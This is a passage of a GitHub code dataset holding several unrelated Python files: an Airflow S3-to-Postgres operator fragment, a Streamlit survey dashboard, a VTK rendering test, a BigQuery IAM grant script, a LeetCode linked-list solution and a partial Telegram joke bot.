established.')\r\n\r\n postgres_conn = postgres_hook.get_conn()\r\n postgres_cur = postgres_conn.cursor()\r\n\r\n postgres_columns = ''\r\n if self.postgres_columns_list is not None:\r\n postgres_columns = f'({\", \".join(self.postgres_columns_list)})' \r\n\r\n postgres_cur.copy_expert(f\"\"\"\r\n COPY {self.postgres_table} {postgres_columns} FROM STDIN\r\n \"\"\", tmp_file) \r\n postgres_conn.commit()\r\n self.log.info(f'Data copied to {self.postgres_table} Postgres table.')\r\n ","repo_name":"luizgnf/project-etl-pokemon","sub_path":"dags/custom/operators/custom_s3_to_postgres.py","file_name":"custom_s3_to_postgres.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"36676408878","text":"import pandas as pd\r\nimport streamlit as st\r\nimport altair as alt\r\nimport numpy as np\r\n\r\n\r\ndef main():\r\n\r\n df = load_data()\r\n\r\n \r\n\r\n st.title(\"Is ITB Students Ready for Industry Revolution 4.0?\")\r\n st.markdown(\"---\")\r\n st.markdown(\"### Respondent Monitoring Dashboard\")\r\n st.markdown(\"#### By: Christofel Rio Goenawan\")\r\n\t\r\n st.markdown(\"---\")\r\n viz_type_filter = st.selectbox(\"How do you want to see?\", ['Overview','Detailed Information'],0)\r\n\r\n if viz_type_filter == 'Overview':\r\n\r\n # Create overview statistics\r\n average_readiness = str(np.mean(df[\"Readiness\"]))+(\" / 5.0\")\r\n many_not_ready = np.sum(df[\"Not Ready\"])\r\n many_ready = len(df) - many_not_ready\r\n\r\n data = {'Average Readiness':[average_readiness], 'Number of Ready Students':[many_ready], 'Number of Not Ready':[many_not_ready]} \r\n \r\n # Create DataFrame \r\n df_stat = pd.DataFrame(data) \r\n\r\n \r\n\r\n st.table(df_stat.assign(hack='').set_index('hack'))\r\n 
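# note: the assign('hack')/set_index('hack') chain above is a common trick to hide the DataFrame index column in st.table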
\r\n\r\n st.markdown(\"> Chart in this page shows the comparison of number of respondents who is feel ready or not\")\r\n st.markdown(\"**Respondents: {}**\".format(len(df)))\r\n \r\n\r\n variable_filter = st.selectbox(\"Variable Filter\", ['No Filter','University',\"Faculty\", \"Batch Year\", \"Know Revolution 4.0 or Not\"],0)\r\n\r\n if variable_filter == 'No Filter':\r\n visualize_is_tested_comparison(df,None)\r\n elif variable_filter == 'University':\r\n visualize_is_tested_comparison(df,\"university\")\r\n elif variable_filter == \"Faculty\":\r\n visualize_is_tested_comparison(df,\"Faculty\")\r\n elif variable_filter == \"Batch Year\":\r\n visualize_is_tested_comparison(df,'Batch Year')\r\n elif variable_filter == \"Know Revolution 4.0 or Not\":\r\n visualize_is_tested_comparison(df,'Know Industry 4.0')\r\n else:\r\n st.write(\"Work in Progress..\")\r\n\r\n\r\n elif viz_type_filter == 'Detailed Information':\r\n st.markdown(\"> Charts in this page are detailed information of Data\")\r\n st.markdown(\"### Skills provided by ITB\")\r\n\r\n skill_list = [\"Skill coding\", \"Big Data Skills\", \"Machine Learning Skills\", \"Creativity\", \"People Management\", \"Critical Thinking\"]\r\n\r\n data = {'Count':[]}\r\n # Create DataFrame \r\n df_skill_provided = pd.DataFrame(data) \r\n\r\n for skill in skill_list:\r\n df_skill_provided.loc[skill] = np.sum(df[\"Because \"+str(skill)])\r\n\r\n df_skill_provided = df_skill_provided.sort_values(by=[\"Count\"] , ascending = False)\r\n\r\n st.bar_chart(df_skill_provided, height=800,width=800)\r\n\r\n st.markdown(\"### Skills should be provided by ITB\")\r\n\r\n df_skill_should_provided = pd.DataFrame(data) \r\n\r\n for skill in skill_list:\r\n df_skill_should_provided.loc[skill] = np.sum(df[\"Should \"+str(skill)])\r\n\r\n df_skill_should_provided = df_skill_should_provided.sort_values(by=[\"Count\"] , ascending = False)\r\n\r\n st.bar_chart(df_skill_should_provided, height=800,width=800)\r\n\r\n\r\ndef load_data():\r\n\tdf = pd.read_csv('survey_data.csv')\r\n\r\n\tdf['filling date'] = pd.to_datetime(df['filling date']).dt.date\r\n\r\n\treturn df\r\n\r\n\r\ndef visualize_is_tested_comparison(df,variable):\r\n\t\r\n\tif variable==None:\r\n\t\tdf_grouped = df.groupby(['Readiness']).size().reset_index(name='count')\r\n\r\n\t\tbars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\ty = alt.Y('sum(count):Q', stack='zero',title='count')\r\n\t\t\t)\r\n\r\n\t\tgroup_bars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\ty = alt.Y('sum(count):Q', stack='zero',title='count'),\r\n\t\t\ttooltip = [alt.Tooltip('sum(count):Q',title='count')],\r\n\t\t\tcolor = alt.Color('Readiness')\r\n\t\t\t)\r\n\r\n\t\ttext = bars.mark_text(dy=-10).encode(\r\n\t\t\ttext = 'sum(count):Q'\r\n\t\t\t)\r\n\r\n\t\tgroup_text = alt.Chart(df_grouped).mark_text(dy=12,color='white').encode(\r\n\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\ty = alt.Y('sum(count):Q', stack='zero'),\r\n\t\t\tdetail = 'Readiness:N',\r\n\t\t\ttext = alt.Text('sum(count):Q')\r\n\t\t\t)\r\n\r\n\t\tst.altair_chart((group_bars + text + group_text).properties(height=800,width=800,title='Comparison Between Readiness'))\r\n\r\n\telse:\r\n\r\n\t\tfor _type in df[variable].unique():\r\n\t\t\tdf_temp = df[df[variable]==_type]\r\n\t\t\tdf_grouped = df_temp.groupby(['Readiness']).size().reset_index(name='count')\r\n\r\n\t\t\tbars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\t\ty = alt.Y('sum(count):Q', 
stack='zero',title='count')\r\n\t\t\t\t)\r\n\r\n\t\t\tgroup_bars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\t\ty = alt.Y('sum(count):Q', stack='zero',title='count'),\r\n\t\t\t\ttooltip = [alt.Tooltip('sum(count):Q',title='count')],\r\n\t\t\t\tcolor = alt.Color('Readiness')\r\n\t\t\t\t)\r\n\r\n\t\t\ttext = bars.mark_text(dy=-10).encode(\r\n\t\t\t\ttext = 'sum(count):Q'\r\n\t\t\t\t)\r\n\r\n\t\t\tgroup_text = alt.Chart(df_grouped).mark_text(dy=12,color='white').encode(\r\n\t\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\t\ty = alt.Y('sum(count):Q', stack='zero'),\r\n\t\t\t\tdetail = 'Readiness:N',\r\n\t\t\t\ttext = alt.Text('sum(count):Q')\r\n\t\t\t\t)\r\n\r\n\t\t\tst.altair_chart((group_bars + text + group_text).properties(height=800,width=800,title='Comparison Between Readiness on ' + str(variable)+ \" :\" + str(_type)))\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"christofel04/Real-Time-Customizable-Dashboard-of-G-Form","sub_path":"main_function_streamlit.py","file_name":"main_function_streamlit.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9034114049","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Test the scalar bar actor using a logarithmic lookup table\n#\nVTK_INTEGRATE_BOTH_DIRECTIONS = 2\n#\n# generate tensors\nptLoad = vtk.vtkPointLoad()\nptLoad.SetLoadValue(100.0)\nptLoad.SetSampleDimensions(20,20,20)\nptLoad.ComputeEffectiveStressOn()\nptLoad.SetModelBounds(-10,10,-10,10,-10,10)\n# Generate hyperstreamlines\ns1 = vtk.vtkHyperStreamline()\ns1.SetInputConnection(ptLoad.GetOutputPort())\ns1.SetStartPosition(9,9,-9)\ns1.IntegrateMinorEigenvector()\ns1.SetMaximumPropagationDistance(18.0)\ns1.SetIntegrationStepLength(0.1)\ns1.SetStepLength(0.01)\ns1.SetRadius(0.25)\ns1.SetNumberOfSides(18)\ns1.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns1.Update()\n# Map hyperstreamlines\nlut = vtk.vtkLogLookupTable()\nlut.SetHueRange(.6667,0.0)\nscalarBar = vtk.vtkScalarBarActor()\nscalarBar.SetLookupTable(lut)\nscalarBar.SetTitle(\"Stress\")\nscalarBar.GetPositionCoordinate().SetCoordinateSystemToNormalizedViewport()\nscalarBar.GetPositionCoordinate().SetValue(0.1,0.05)\nscalarBar.SetOrientationToVertical()\nscalarBar.SetWidth(0.1)\nscalarBar.SetHeight(0.9)\nscalarBar.SetPosition(0.01,0.1)\nscalarBar.SetLabelFormat(\"%-#6.3f\")\nscalarBar.GetLabelTextProperty().SetColor(1,0,0)\nscalarBar.GetTitleTextProperty().SetColor(1,0,0)\ns1Mapper = vtk.vtkPolyDataMapper()\ns1Mapper.SetInputConnection(s1.GetOutputPort())\ns1Mapper.SetLookupTable(lut)\nptLoad.Update()\n#force update for scalar range\ns1Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns1Actor = vtk.vtkActor()\ns1Actor.SetMapper(s1Mapper)\ns2 = vtk.vtkHyperStreamline()\ns2.SetInputConnection(ptLoad.GetOutputPort())\ns2.SetStartPosition(-9,-9,-9)\ns2.IntegrateMinorEigenvector()\ns2.SetMaximumPropagationDistance(18.0)\ns2.SetIntegrationStepLength(0.1)\ns2.SetStepLength(0.01)\ns2.SetRadius(0.25)\ns2.SetNumberOfSides(18)\ns2.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns2.Update()\ns2Mapper = vtk.vtkPolyDataMapper()\ns2Mapper.SetInputConnection(s2.GetOutputPort())\ns2Mapper.SetLookupTable(lut)\ns2Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns2Actor = vtk.vtkActor()\ns2Actor.SetMapper(s2Mapper)\ns3 = 
vtk.vtkHyperStreamline()\ns3.SetInputConnection(ptLoad.GetOutputPort())\ns3.SetStartPosition(9,-9,-9)\ns3.IntegrateMinorEigenvector()\ns3.SetMaximumPropagationDistance(18.0)\ns3.SetIntegrationStepLength(0.1)\ns3.SetStepLength(0.01)\ns3.SetRadius(0.25)\ns3.SetNumberOfSides(18)\ns3.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns3.Update()\ns3Mapper = vtk.vtkPolyDataMapper()\ns3Mapper.SetInputConnection(s3.GetOutputPort())\ns3Mapper.SetLookupTable(lut)\ns3Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns3Actor = vtk.vtkActor()\ns3Actor.SetMapper(s3Mapper)\ns4 = vtk.vtkHyperStreamline()\ns4.SetInputConnection(ptLoad.GetOutputPort())\ns4.SetStartPosition(-9,9,-9)\ns4.IntegrateMinorEigenvector()\ns4.SetMaximumPropagationDistance(18.0)\ns4.SetIntegrationStepLength(0.1)\ns4.SetStepLength(0.01)\ns4.SetRadius(0.25)\ns4.SetNumberOfSides(18)\ns4.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns4.Update()\ns4Mapper = vtk.vtkPolyDataMapper()\ns4Mapper.SetInputConnection(s4.GetOutputPort())\ns4Mapper.SetLookupTable(lut)\ns4Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns4Actor = vtk.vtkActor()\ns4Actor.SetMapper(s4Mapper)\n# plane for context\n#\ng = vtk.vtkImageDataGeometryFilter()\ng.SetInputConnection(ptLoad.GetOutputPort())\ng.SetExtent(0,100,0,100,0,0)\ng.Update()\n#for scalar range\ngm = vtk.vtkPolyDataMapper()\ngm.SetInputConnection(g.GetOutputPort())\ngm.SetScalarRange(g.GetOutput().GetScalarRange())\nga = vtk.vtkActor()\nga.SetMapper(gm)\n# Create outline around data\n#\noutline = vtk.vtkOutlineFilter()\noutline.SetInputConnection(ptLoad.GetOutputPort())\noutlineMapper = vtk.vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\noutlineActor = vtk.vtkActor()\noutlineActor.SetMapper(outlineMapper)\noutlineActor.GetProperty().SetColor(0,0,0)\n# Create cone indicating application of load\n#\nconeSrc = vtk.vtkConeSource()\nconeSrc.SetRadius(.5)\nconeSrc.SetHeight(2)\nconeMap = vtk.vtkPolyDataMapper()\nconeMap.SetInputConnection(coneSrc.GetOutputPort())\nconeActor = vtk.vtkActor()\nconeActor.SetMapper(coneMap)\nconeActor.SetPosition(0,0,11)\nconeActor.RotateY(90)\nconeActor.GetProperty().SetColor(1,0,0)\n# Create the rendering infrastructure\n#\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetMultiSamples(0)\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\ncamera = vtk.vtkCamera()\ncamera.SetFocalPoint(0.113766,-1.13665,-1.01919)\ncamera.SetPosition(-29.4886,-63.1488,26.5807)\ncamera.SetViewAngle(24.4617)\ncamera.SetViewUp(0.17138,0.331163,0.927879)\ncamera.SetClippingRange(1,100)\nren1.AddActor2D(scalarBar)\nren1.AddActor(s1Actor)\nren1.AddActor(s2Actor)\nren1.AddActor(s3Actor)\nren1.AddActor(s4Actor)\nren1.AddActor(outlineActor)\nren1.AddActor(coneActor)\nren1.AddActor(ga)\nren1.SetBackground(1.0,1.0,1.0)\nren1.SetActiveCamera(camera)\nrenWin.SetSize(300,300)\nrenWin.Render()\n# prevent the tk window from showing up then start the event loop\n# --- end of script --\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Filters/Modeling/Testing/Python/HyperScalarBar.py","file_name":"HyperScalarBar.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"16332764708","text":"from google.cloud import bigquery\n\nimport os\n\nif __name__ == '__main__':\n path_to_credential = '/Users/wangez/Downloads/agolis-allen-first-2a651eae4ca4.json'\n 
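# google-auth reads GOOGLE_APPLICATION_CREDENTIALS (set below) to locate the service-account key used by bigquery.Client()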
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path_to_credential\n client=bigquery.Client()\n\n table=client.get_table('agolis-allen-first.ELM.all_dt_test')\n role='roles/bigquery.dataViewer'\n\n\n\n p = client.get_iam_policy(table)\n user=\"user:wangez@google.com\"\n p.bindings.append({\"role\":\"roles/bigquery.dataViewer\",\"members\":{user}})\n client.set_iam_policy(table,p)\n\n\n print('x')\n\n\n\n","repo_name":"DigitalWNZ/gcp_python_code","sub_path":"iam_sample.py","file_name":"iam_sample.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775071951","text":"'''\n\n'''\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n carry = 0\n dummy = ListNode()\n curr = dummy\n while l1 and l2:\n s = l1.val + l2.val + carry\n curr.next = ListNode(s%10)\n curr = curr.next\n carry = s // 10\n l1 = l1.next\n l2 = l2.next\n balance = l1 or l2\n while balance:\n s = balance.val + carry\n curr.next = ListNode(s%10)\n curr = curr.next\n carry = s // 10\n balance = balance.next\n if carry:\n curr.next = ListNode(carry)\n return dummy.next\n","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2022/03. March/10.addTwoNumbers.py","file_name":"10.addTwoNumbers.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20507631261","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nimport time\nimport datetime\nimport logging\nimport DWM10_Parms\nimport DWM14_BuildRefDict\nimport DWM15_BuildLinkIndex\nimport DWM16_BuildTokenFreqDict\nimport DWM25_Global_Token_Replace\nimport DWM42_BuildBlockPairs\nimport DWM45_Block_Cleaning\nimport DWM55_LinkBlockPairs\nimport DWM80_TransitiveClosure\nimport DWM90_IterateClusters\nimport DWM96_WriteLinkIndex\nimport DWM97_ClusterProfile\nimport DWM99_ERmetrics\nimport DWM100_ReportData\nimport xlsxwriter\n\n\n# In[2]:\n\n\n# Main Driver for Refactored Data Washing Machine\n# Version 1.20 creates a log file with same information being written to console\n# Version 1.30 creates cluster profile at end of program and evaluates ER statistics\n# Version 1.40 FK - added module DWM25 to do global level token replacement\n# JRT - added DWM65_ScoringMatrix to allow ScoringMatrix as a comparitor type\n# Version 1.50 Revised and corrected scoring matrix\n# Revised DWM25 Global Replacement to reuse Tokenizer Dictionary and use DWM_WordList.txt\n# Version 1.60 Implemented 2 versions of Scoring Rule - Standard (Std) and Weighted (Kris)\n# Changed Parms to be a class imported by all modules\n# Version 1.70 Added new parameter minBlkTokenLen to set a minimum length for blokcing tokens\n# Improved performance of global cleaning\n# Version 1.80 Added new parameter excludeNumericBlocks when True does not block on numeric tokens\n# Added new parameter removeExcludedBlkTokens when True removes tokens excluded by\n# minBlkTokenLen & exludeNumbericBlocks\n# Added timer and added Total Runtime to logging statistics\n# Version 1.90 Extensive refactor of the processing logic separating stop word removal from blocking.\n# Also generate and deduplicate pairs from all blocks before comparing or correcting references\n# Added a new parameter blockByPairs requiring refs in a 
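# Editor's sketch for iam_sample.py above: appending a fresh binding on every
# run accumulates duplicates, so it is safer to merge the member into an
# existing binding for the role when one is present. The binding structure
# (a dict with a "role" string and a "members" collection) follows the usage
# in the snippet above.
from google.cloud import bigquery

def grant_table_role(client, table_ref, member, role="roles/bigquery.dataViewer"):
    table = client.get_table(table_ref)
    policy = client.get_iam_policy(table)
    for binding in policy.bindings:
        if binding["role"] == role:
            # normalize to a set so repeated grants stay idempotent
            binding["members"] = set(binding["members"]) | {member}
            break
    else:
        policy.bindings.append({"role": role, "members": {member}})
    client.set_iam_policy(table, policy)

# grant_table_role(bigquery.Client(), "agolis-allen-first.ELM.all_dt_test",
#                  "user:wangez@google.com")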
block to share 2 tokens\n# Version 2.00 Added new parameter runIterationProfile to print profile & stats at end of each iteration\n# Also generated new token statistics for number of all-digit (numeric) tokens and ratio to total\n# Added token length profile and statistics\n# Version 2.10 Added DWM100 for reporting to create a spreadsheet of statistics with parameter settings.\n# Added DWM45 with a new parameter blockCorrection to correct blocking tokens.\n# Added changes to DWM25 and DWM80 for faster processing of data.\n# Version 2.20 Both global and block corrections output to log file instead of separate files\n# 3 new parms, globalCorrectionDetail, blockCorrectionDetail, addRefsToLinkIndex\n# Version 2.21 Corrected two bugs, one in Global Correction, and one in DWM90\ndef DWM_Cluster(fname):\n version = 2.21\n\n # get start time for timer\n startTime = time.time()\n # date time is used to label the logfile\n now = datetime.datetime.now()\n tag = str(now.year)+(str(now.month)).zfill(2)+(str(now.day)).zfill(2)\n tag = tag+'_'+(str(now.hour)).zfill(2)+'_'+(str(now.minute)).zfill(2)\n logFile = open('DWM_Log_'+tag+'.txt','w')\n print(\"Data Washing Machine Refactor Version\",version)\n print(\"Data Washing Machine Refactor Version\",version, file=logFile)\n print(\"Date/Time\",tag)\n print(\"Data/Time\",tag, file=logFile)\n # while True:\n # choice = input('Enter 1 to run single parms file, Enter 2 to run a list of parms files ->')\n # if choice == '1':\n # multi = False\n # parmFileName = input('Enter Name of a Single Parameter File ->')\n # break\n # if choice == '2':\n # multi = True\n # fileName = input('Enter Name of a List of Parameter Files ->')\n # file1 = open(fileName, 'r')\n # break\n # print('Try again')\n #data reporting init\n multi = False\n parmFileName = fname\n excelFileName = 'DWM_Results_'+tag+'.xlsx'\n DWM10_Parms.workbook = xlsxwriter.Workbook(excelFileName)\n DWM10_Parms.worksheet = DWM10_Parms.workbook.add_worksheet()\n DWM10_Parms.startRow = 0\n while True: \n now1 = datetime.datetime.now()\n # if multi == True:\n # parmFileName = file1.readline()\n # print('\\n\\nRunning parms file',parmFileName)\n # print('\\nRunning parms file ',parmFileName, file=logFile)\n # parmFileName = parmFileName.replace('\\n','')\n # if not parmFileName:\n # print('\\nEnd of the parmFileName Runs')\n # break\n \n print('\\n\\nRunning parms file',parmFileName)\n print('\\nRunning parms file ',parmFileName, file=logFile) \n DWM10_Parms.getParms(parmFileName, logFile)\n # Must get mu start and save to muStart for single parms file\n # and epsilonStart for parmeter single parms file\n # DWM10_Parms.blockCorrection changes if DWM45 runs need original value for reporting\n DWM10_Parms.muStart=DWM10_Parms.mu\n DWM10_Parms.epsilonStart=DWM10_Parms.epsilon\n DWM10_Parms.blockCorrect =DWM10_Parms.blockCorrection\n # Create refDict, a dictionary where key=refID, value is list of reference tokens\n refDict = DWM14_BuildRefDict.tokenizeInput()\n # Create linkIndx, a dictionary where key=refID, value is cluster ID`\n linkIndex = DWM15_BuildLinkIndex.buildLinkIndex(refDict)\n # Create tokenFeqDict, a dictionary where key=token, value is token frequency\n tokenFreqDict =DWM16_BuildTokenFreqDict.buildTokenFreqDict(refDict)\n # create dictionary of corrections (stdTokenDict), leave empty if not running replacement\n #if global replacement configured, populate stdTokenDict of corrections in DWM25\n if DWM10_Parms.runGlobalCorrection:\n refDict = DWM25_Global_Token_Replace.globalReplace(refDict, 
tokenFreqDict)\n tokenFreqDict =DWM16_BuildTokenFreqDict.buildTokenFreqDict(refDict)\n moreToDo = True\n print('\\n>>Starting Iterations')\n print('\\n>>Starting Iterations', file=logFile)\n mu = DWM10_Parms.mu\n print('mu start value=', mu)\n print('mu start value=', mu, file=logFile)\n muIterate = DWM10_Parms.muIterate\n print('mu iterate value=', muIterate)\n print('mu iterate value=', muIterate, file=logFile)\n epsilon = DWM10_Parms.epsilon\n print('epsilon start value=', epsilon)\n print('epsilon start value=', epsilon, file=logFile)\n epsilonIterate = DWM10_Parms.epsilonIterate\n print('epsilon iterate value=', epsilonIterate)\n print('epsilon iterate value=', epsilonIterate, file=logFile)\n comparator = DWM10_Parms.comparator\n print('comparator =', comparator)\n print('comparator =', comparator, file=logFile)\n firstIteration = True\n while moreToDo:\n print('\\n****New Iteration\\nSize of refDict =', len(refDict)) \n print('\\n****New Iteration\\nSize of refDict =', len(refDict), file=logFile) \n #blockList = DWM40_BuildBlocks.buildBlocks(logFile, refList, tokenFreqDict)\n blockPairList = DWM42_BuildBlockPairs.buildBlockPairs(refDict, linkIndex, tokenFreqDict)\n if len(blockPairList)==0:\n print('--Ending because blockPairList is empty')\n print('--Ending because blockPairList is empty', file=logFile)\n break\n # If block correction requested, only run once on first iteration\n if DWM10_Parms.blockCorrection and firstIteration:\n changeCount = DWM45_Block_Cleaning.RunBlockCorrections(blockPairList, tokenFreqDict, refDict)\n # if there were block corrections, rebuild token dictionary and re-block\n if changeCount > 0:\n tokenFreqDict=DWM16_BuildTokenFreqDict.buildTokenFreqDict(refDict)\n blockPairList = DWM42_BuildBlockPairs.buildBlockPairs(refDict, linkIndex, tokenFreqDict) \n firstIteration = False\n linkedPairList = DWM55_LinkBlockPairs.linkBlockPairs(blockPairList, refDict, tokenFreqDict)\n if len(linkedPairList)==0:\n print('Ending because linkedPairList is empty')\n print('Ending because linkedPairList is empty', file=logFile)\n break\n clusterList = DWM80_TransitiveClosure.transitiveClosure(linkedPairList)\n if len(clusterList)==0:\n print('--Ending because clusterList is empty') \n print('--Ending because clusterList is empty', file=logFile)\n break \n iterationLinkIndex = DWM90_IterateClusters.iterateClusters(clusterList, refDict, linkIndex)\n print(iterationLinkIndex)\n print(\"\\n>>Itermediate Results from this Iteration\")\n print(\"\\n>>Itermediate Results from this Iteration\", file=logFile)\n # Run iteration profile and statistics if requested\n if DWM10_Parms.runIterationProfile:\n DWM97_ClusterProfile.generateProfile(iterationLinkIndex)\n if DWM10_Parms.truthFileName != '':\n DWM99_ERmetrics.generateMetrics(iterationLinkIndex)\n print('\\n>>End of Iteration, Resetting mu and epsilon')\n print('\\n>>End of Iteration, Resetting mu and epsilon', file=logFile)\n mu += muIterate\n mu = round(mu, 2)\n DWM10_Parms.mu = mu\n print('>>>New Value of mu = ',mu)\n print('>>>New Value of mu = ',mu, file=logFile)\n epsilon += epsilonIterate\n epsilon = round(epsilon, 2)\n DWM10_Parms.epsilon = epsilon\n print('>>>New Value of epsilon = ',epsilon)\n print('>>>New Value of epsilon = ',epsilon, file=logFile)\n if mu > 1.0:\n moreToDo = False\n print('Ending because mu > 1.0')\n print('Ending because mu > 1.0', file=logFile)\n # End of iterations\n # write Link Index to text file\n DWM96_WriteLinkIndex.writeLinkIndex(linkIndex, refDict)\n # Generate Cluster Profile\n 
DWM97_ClusterProfile.generateProfile(linkIndex)\n # Generat ER Metrics if truthFileName was given\n if DWM10_Parms.truthFileName != '':\n DWM99_ERmetrics.generateMetrics(linkIndex)\n DWM100_ReportData.reportData()\n now2 = datetime.datetime.now()\n print(\"\\nTotal File Runtime =\", now2-now1, file=logFile)\n print(\"\\nEnd of File \",parmFileName)\n print('Time to run File ', now2-now1)\n print(\"End of File \",parmFileName, file=logFile)\n if multi==False:\n break\n endTime = time.time()\n totalTime = endTime - startTime\n print(\"All Files Total Runtime =\", totalTime/60, \" minutes\")\n print(\"All Files Total Runtime =\", totalTime/60, \" minutes\", file=logFile)\n print(\"End of Program\")\n print(\"End of Program\", file=logFile)\n logFile.close()\n DWM10_Parms.workbook.close()\n\n","repo_name":"OnaisKhanMohammed/Census-Linking","sub_path":"DWM00_Driver.py","file_name":"DWM00_Driver.py","file_ext":"py","file_size_in_byte":11088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14251239841","text":"class Curso():\r\n def __init__(self,nom,cre,pro):\r\n self.nombre = nom\r\n self.creditos = cre\r\n self.profesion = pro\r\n self.__imparticion = \"presencial\" #Propiedad encapsulada\r\n\r\n def mostrarDatos(self):\r\n dat = \"Nombre: {} / Creditos: {} / Modo de imparticion: {}\"\r\n print(dat.format(self.nombre,self.creditos,self.__imparticion))\r\n docenteAsignado = self.__verificarDocente()\r\n if docenteAsignado:\r\n print(\"Existe docente asigando\")\r\n else:\r\n print(\"No es necesario asignar un docente...\")\r\n\r\n def __verificarDocente(self):\r\n # print(\"Vericando si existe un docente asignado...\")\r\n if self.__imparticion == \"presencial\":\r\n return True\r\n else:\r\n return False\r\n\r\n def __str__(self):\r\n texto = \"nombre: {} - creditos: {}\"\r\n return texto.format(self.nombre,self.creditos)\r\n\r\n# curso1 = Curso(\"Matematica\",5,\"Ingenieria civil\")\r\n# print(curso1)\r\n# curso1.mostrarDatos()\r\n\r\n\r\n# curso2 = Curso(\"Lenguaje\",4,\"Ingenieria industrial\")\r\n# print(curso2.nombre)","repo_name":"FernandoReyesV2/S9-TAREA_2","sub_path":"Ejercicio_27.py","file_name":"Ejercicio_27.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8964674296","text":"import sys\nfrom collections import defaultdict, deque\n\nfrom telegram.ext import Updater, CommandHandler, MessageHandler\n\nfrom constants import TRIGGERS\n\nTOKEN = ''\n\n\n\nDEFAULT_SETTINGS = {\n 'autoninja': True\n}\n\n\ndef get_default_settings():\n return DEFAULT_SETTINGS\n\n\ndef chat_queue():\n return deque(50*[None], maxlen=50)\n\n\nmessages = defaultdict(chat_queue)\nsettings = defaultdict(get_default_settings)\n\n\nCHAT_ID_PODEMOS_HABLAR = -213095736\n\n\ndef hello(bot, update):\n update.message.reply_text(\n 'Hola {} ...querés ninja'.format(update.message.from_user.first_name))\n\n\ndef autoninja(bot, update):\n chat_id = update.message.chat.id\n option = update.message.text.split(' ')\n chat_setting = settings[chat_id]\n\n if len(option) == 1:\n autoninja_status = chat_setting['autoninja']\n print('Toggling autoninja')\n autoninja_new_status = not autoninja_status\n else:\n autoninja_new_status = False if option[1] == 'off' else True\n\n chat_setting['autoninja'] = autoninja_new_status\n update.message.reply_text(\n 'Modo autoninja {}'.format('on' if autoninja_new_status else 'off'))\n\n\ndef ninjasettings(bot, update):\n chat_id = 
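# Editor's note on DWM00_Driver.py above: every status line is printed twice,
# once to the console and once to logFile. A small tee helper (a sketch, not
# part of the original module) keeps both outputs in sync with one call.
def make_logger(log_file):
    def log(*args):
        print(*args)                 # console copy
        print(*args, file=log_file)  # log-file copy
    return log

# log = make_logger(logFile)
# log('Data Washing Machine Refactor Version', version)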
update.message.chat.id\n option = update.message.text.split(' ')\n chat_setting = settings[chat_id]\n autoninja_status = chat_setting['autoninja']\n\n update.message.reply_text(\n 'Settings: Modo autoninja {}'.format('on' if autoninja_status else 'off'))\n\n\ndef ninja(bot, update):\n try:\n chat_id = update.message.chat.id\n message_queue = messages[chat_id]\n message = message_queue[0]\n except:\n print('Error')\n\n if message:\n message.reply_text(\n '{}...{}...claramente..necesita xxx...'.format(message.text,\n message.from_user.first_name))\n else:\n update.message.reply_text(\n '{}...dale que quien quiere xxxx sos vos'.format(update.message.from_user.first_name))\n\n\ndef _sanitize_message(content):\n content = content.lower()\n content = content.replace(',', ' ')\n content = content.replace(',', ' ')\n content = content.replace('.', ' ')\n content = content.replace(';', ' ')\n content = content.replace('#', ' ')\n\n return ' '.join(content.split())\n\ndef _get_ninjable_content(message_content):\n message_content_sanitized = _sanitize_message(message_content).split(' ')\n\n ninjable_content = list(filter(message_content_sanitized.__contains__,\n TRIGGERS.keys()))\n\n return ninjable_content[0] if ninjable_content else None\n\ndef process_message(bot, update):\n chat_id = update.message.chat.id\n chat_setting = 